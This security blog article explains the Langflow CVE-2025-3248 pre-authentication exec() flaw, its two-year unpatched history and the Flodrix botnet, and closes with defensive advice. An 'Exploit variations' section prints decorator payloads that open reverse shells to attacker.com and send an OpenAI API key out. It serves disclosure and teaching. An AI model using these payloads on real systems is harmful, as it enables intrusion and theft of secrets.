Langflow RCE: The exec() That Ran Before Authentication
An AI workflow builder used exec() to validate code — before checking if the user was logged in. Attackers noticed. A deep dive into CVE-2025-3248, the botnet that followed, and what it means for anyone building with AI tools.
The endpoint that executed first and asked questions later
Langflow had a code validation endpoint. The idea was simple: users building AI workflows could submit Python code, and the server would check whether it was valid before running it in a pipeline. Standard developer experience stuff.
Here's the problem. The endpoint used exec() to "validate" that code. And it did so before checking whether the request came from an authenticated user.
Read that again. The server would execute arbitrary Python code from an unauthenticated HTTP request, and only afterward attempt to verify the caller's identity. By the time the auth check ran, the damage was already done.
The result was CVE-2025-3248 — a CVSS 9.8 critical vulnerability that let anyone on the internet run arbitrary code on any Langflow server with a single POST request. No credentials. No tokens. No tricks. Just a curl command and a Python one-liner.
What is Langflow, and why does this matter
Langflow is an open-source platform for building AI agents and workflows. Think of it as a visual drag-and-drop builder for LLM pipelines — connect an API to a prompt template, wire it to a vector database, add a chatbot interface. It had over 40,000 GitHub stars and a growing base of developers and enterprises using it to build RAG applications, customer-facing chatbots, and internal AI tools.
The platform is powerful precisely because it lets users run custom Python code as part of their workflows. That power is also what made this vulnerability so dangerous.
Langflow instances are high-value targets. They typically hold API keys for services like OpenAI and Anthropic, have access to training data and internal documents, sit inside corporate networks, and run on GPU-enabled compute that's expensive and useful for cryptomining. One compromised Langflow instance gives an attacker a foothold into all of it.
How the vulnerability worked
The vulnerable endpoint was /api/v1/validate/code. Its job was to check whether user-submitted Python code was syntactically valid. Here's a simplified version of the code path:
@router.post("/api/v1/validate/code")
async def validate_code(request: CodeValidationRequest):
code = request.code
# Step 1: Parse and execute the code
ast_tree = ast.parse(code)
compiled = compile(ast_tree, '<string>', 'exec')
exec(compiled) # Runs attacker's code RIGHT HERE
# Step 2: Check authentication (too late)
if not is_authenticated(request):
raise HTTPException(401, "Not authenticated")
The ordering is the entire vulnerability. exec() runs on line 7. The auth check happens on line 10. By the time the server realizes the caller isn't logged in, their code has already executed with the full privileges of the Langflow process.
This isn't a subtle logic error buried deep in a complex system. It's the wrong order of operations on a public-facing endpoint. The fix was straightforward: move the auth check above the exec() call. But for every version of Langflow before 1.3.0, the door was wide open.
The decorator trick: Python's parse-time execution
Here's where it gets interesting for the Python community.
You might think exec() only runs the body of the submitted code — that defining a function is safe because the function itself doesn't get called. But Python decorators are evaluated at parse time, not at call time. When the interpreter encounters a decorated function definition, it evaluates the decorator expression immediately.
Attackers used this to smuggle execution into what looks like an innocent function definition:
@exec(__import__('os').system('id'))
def innocent_function():
pass
When exec() processes this code, here's what happens:
- Python encounters the function definition with a decorator
- It evaluates the decorator expression:
__import__('os').system('id') os.system('id')runs — the attacker's command executes- The function object is never even created
- The attacker has code execution
The function body is irrelevant. The decorator is the payload. And because __import__ is a built-in, there's no need to have os or subprocess already imported. Everything the attacker needs is available in a default Python environment.
Exploit variations
The decorator trick enabled a range of attacks, from reconnaissance to full server takeover:
# Reconnaissance
@exec(__import__('os').system('whoami'))
def x(): pass
# Reverse shell
@exec(__import__('os').system(
'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
))
def x(): pass
# Steal API keys from environment variables
@exec(__import__('os').system(
'curl http://attacker.com/?k='
+ __import__('os').environ.get('OPENAI_API_KEY', '')
))
def x(): pass
# Python-native reverse shell (no bash needed)
@exec(
"import socket,subprocess;"
"s=socket.socket();"
"s.connect(('attacker.com',4444));"
"subprocess.call(['/bin/sh','-i'],"
"stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())"
)
def x(): pass
Every one of these payloads fits in a single HTTP request body. No authentication required. No multi-step exploit chain. Just POST to /api/v1/validate/code with the payload as the code field.
Two years of silence
This is the part that stings.
On July 27, 2023, a GitHub user named @Lyutoon opened Issue #696 on the Langflow repository. The report was clear and specific:
"The code validation endpoint can be exploited for RCE through a function definition's default parameter. This allows unauthenticated remote code execution."
The issue sat open. No fix. No triage. No security advisory. For nearly two years.
Here's the full timeline:
| Date | Event |
|---|---|
| July 27, 2023 | @Lyutoon reports the vulnerability in GitHub Issue #696 |
| 2023-2024 | Issue remains open, vulnerability unpatched |
| March 31, 2025 | Langflow 1.3.0 released with fix |
| April 3, 2025 | VulnCheck assigns CVE-2025-3248 |
| May 5, 2025 | CISA adds it to the Known Exploited Vulnerabilities catalog |
| May-June 2025 | Active exploitation campaigns documented in the wild |
Twenty months between "someone told you about this" and "you fixed it." In that window, every Langflow instance on the internet was running an unauthenticated remote code execution endpoint. Anyone who read the GitHub issue had a working exploit.
This is a pattern worth paying attention to. Open-source projects — especially fast-growing ones in the AI space — often prioritize features over security. The maintainers weren't malicious. They were building a product that people loved. But a critical security report collecting dust in a GitHub issue tracker for two years is a systemic failure, not just an oversight.
The Flodrix botnet
The vulnerability didn't stay theoretical. Attackers automated exploitation at scale.
Trend Micro documented an active campaign using CVE-2025-3248 to deploy the Flodrix botnet. The attack chain was straightforward:
- Scan the internet for exposed Langflow instances (Shodan, Censys, or custom scanners)
- Send the decorator payload to
/api/v1/validate/code - Install the Flodrix botnet agent on the compromised server
- Harvest API keys from environment variables
- Use the compromised server for DDoS attacks, cryptomining, and lateral movement into internal networks
The campaign targeted servers in the US, Australia, Singapore, Germany, and Mexico. Greynoise observed 361+ malicious IPs scanning for vulnerable Langflow instances.
On May 5, 2025, CISA added CVE-2025-3248 to the Known Exploited Vulnerabilities (KEV) catalog — the list of vulnerabilities that federal agencies are mandated to patch on a deadline. When CISA puts something in the KEV, it means one thing: this is being exploited right now, at scale, against real targets.
A second vulnerability made it worse
As if one critical RCE wasn't enough, researchers at Obsidian Security found a second critical vulnerability in Langflow: CVE-2025-34291 (CVSS 9.4). This one enabled account takeover and remote code execution simply by having a logged-in Langflow user visit a malicious webpage.
| CVE-2025-3248 | CVE-2025-34291 | |
|---|---|---|
| Type | Unauthenticated RCE | Account takeover + RCE |
| CVSS | 9.8 | 9.4 |
| Attack | Direct POST request | User visits malicious page |
| User interaction | None | One click |
Two critical-severity vulnerabilities in the same AI platform, both enabling full server compromise. The first required no interaction at all. The second required a user to click a link.
The AI tools problem
Langflow's vulnerability isn't an isolated incident. It's a symptom of a broader pattern: AI tools have fundamentally different attack surfaces than traditional web applications.
Traditional web apps handle data — text, images, user records. AI platforms handle code. They evaluate expressions, execute pipelines, run arbitrary logic. The features that make them powerful — dynamic code execution, plugin systems, tool use — are the same features that create dangerous entry points.
This shows up across the AI tooling ecosystem:
- Langflow:
exec()on unauthenticated endpoint - AI-generated code: String concatenation instead of parameterized queries
- Vibe-coded apps broadly: Missing auth, disabled access controls, exposed secrets
The OWASP Top 10 maps directly to what happened here. CVE-2025-3248 is simultaneously A03 (Injection), A07 (Authentication Failures), and A04 (Insecure Design). Using exec() on user input is a design problem. Doing it before auth is an implementation problem. Together, they're catastrophic.
For builders using AI platforms and AI-generated code: the tools you rely on may have vulnerabilities you can't see from the outside. Langflow looked like a polished, well-maintained project with 40,000 GitHub stars. The RCE was invisible until someone checked.
What you should do right now
Whether you're running Langflow, building on another AI platform, or shipping code that AI helped you write, here's what matters:
-
If you run Langflow, upgrade immediately. Version 1.3.0 and later have the fix. If you can't upgrade right now, block external access to the instance with firewall rules. Check your logs for requests to
/api/v1/validate/codefrom unexpected sources — and rotate every API key stored in that environment.pip install langflow>=1.3.0 -
Audit your AI tools the way you'd audit your own code. What endpoints does your AI platform expose? Do they all require authentication? Can you hit them from outside your network? These aren't hypothetical questions — they're the difference between CVE-2025-3248 affecting you or not.
-
Never trust that "validation" means "safe." Langflow's endpoint was called "validate" — but it used
exec(). The name of a function doesn't determine what it does. If you're building features that touch user-submitted code, use static analysis (AST inspection without execution), sandboxed environments, or both. Neverexec()oreval()on untrusted input. -
Check authentication ordering in your own code. This vulnerability existed because auth happened after processing. Review your middleware stack. Does every dangerous operation check credentials first? In frameworks like FastAPI and Express, it's easy to accidentally process a request body before auth middleware runs.
The ordering matters
CVE-2025-3248 is, at its core, a story about ordering. Execute first, authenticate later. That's it. No exotic memory corruption. No complex exploit chain. Just two operations in the wrong sequence, exposed to the internet for two years while a GitHub issue sat unanswered.
The Langflow team fixed it. CISA flagged it. But the Flodrix botnet had already moved in. API keys had already been harvested. Servers had already been conscripted into DDoS networks.
The lesson isn't that Langflow is bad software. It's that AI tools carry AI-sized risks, and the security basics — authenticate before you process, never exec untrusted input, respond to vulnerability reports — haven't changed just because the tools got smarter.
Build with AI tools. Ship fast. But check the locks before you leave the door open.
CVE-2025-3248 is documented in public research by Horizon3.ai, Trend Micro, Zscaler ThreatLabz, and CISA KEV.